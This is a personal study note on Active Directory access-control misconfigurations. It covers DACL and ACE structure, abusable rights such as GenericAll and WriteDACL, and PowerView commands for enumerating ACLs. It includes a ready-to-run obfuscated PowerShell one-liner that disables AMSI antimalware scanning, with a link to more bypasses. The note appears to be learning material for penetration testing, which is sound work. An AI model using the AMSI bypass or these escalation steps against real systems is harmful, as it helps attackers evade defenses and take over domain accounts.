This page will be edited as I progress in AD enumeration.

# Table Of Contents

What are access controls?
- DACL
PowerView

# What are access controls

To understand the attack vectors in AD we must first understand what is the thing that we are attacking.

Misconfigurations in access controls are the most common priviledge escalation vectors in AD.

When a user wants to authenticate to a resource (shared folder, service etc.) it happens in two steps.

The user provides its access token to the target object, which contains the users identity and priviledges.
The object validaidates it against the DACL (Discretionary Access Control List) and based on that it grants or denies access. Additionally the request will be logged by the SACL (System Access Control List) regardless of the outcome.

# DACL

Discretionary Access Control List's structure consists of multiple ACE's (Access Control Entries). An ACE has a few properties.

Permission type: Allow, Deny
Principal Account: Who is the permission for (user, group, computer)
What objects the principal account can access
Access Rights: Read, Write, Full Control

When looking at a object's ACE's, there are a few properties to look out for, for usefull information.

ObjectDN (Object Distinguished Name)
IdentityReference: Who has access to the object (for example: built-in administrators)
ActiveDirectoryRights: Types of permissions given to the object
AccessControlType: Allow access

The ActiveDirectoryRights is the goldmine for usefull info. Here are some permissions to look out for. This list will probably expand relative to my knowledge.


GenericAll - Full rights to the object (add users to a group or reset user's password without knowing the existing password)

GenericWrite - Update the object's attributes (i.e logon script)

WriteOwner - Change the object's owner to attacker controled user to take over the object

WriteDACL - Modify the object's ACEs and give the attacker full control right over the object

AllExtendedRights - Ability to add user to a group or reset password

ForceChangePassword - Ability to change the user's password

Self (Self-Membership) - Ability to add yourself to a group

# PowerView

PowerView is a powershell script that when imported extends the functionality of your powershell session and gives you a battleaxe against the AD.

# Quick Start

To import the script run:

Import-Module .\PowerView.ps1

# AMSI Bypass

If the AMSI (Antimalware Scan Interface) blocks the command there are ways to bypass it.

For example:

S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ([TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE (('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(("{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

Also there is a GitHub page dedicated to this:

https://gist.github.com/reigningshells/a255fcca07465befbcbf4be9cdf67560

# Get ACLs of Users and Groups Objects

To enumerate an objects' access control permissions, run:

Get-ObjectAcl -SAMAccountName <object>

Filter objects that have permission type GenericAll:

Get-ObjectAcl <object> |{$_.ActiveDirectoryRights - eq "GenericAll"}

Get ACLs associated with specific prefix (OU, DC etc.):

Get-ObjectAcl -ADSprefix 'OU=SomeOU' -Verbose

Get ACLs associated with specific LDAP path:

powershell

Get-ObjectAcl -ADSpath "LDAP://<path>" -ResolveGUIDs -Verbose

Get AdPaths of objects with:

Get-Netcomputers -FullData | select cn, adspath Get-NetGroups -FullData | select cn, adspath

PowerView has a scanner that will scan the whole domain for interesting vectors:

Invoke-ACLScanner -ResolveGUIDs

We can also search for ACLs associated with UNC path (for example: network shares):

Get-PathAcl -Path "\\dc01.isaacfletcher.local\sysvol"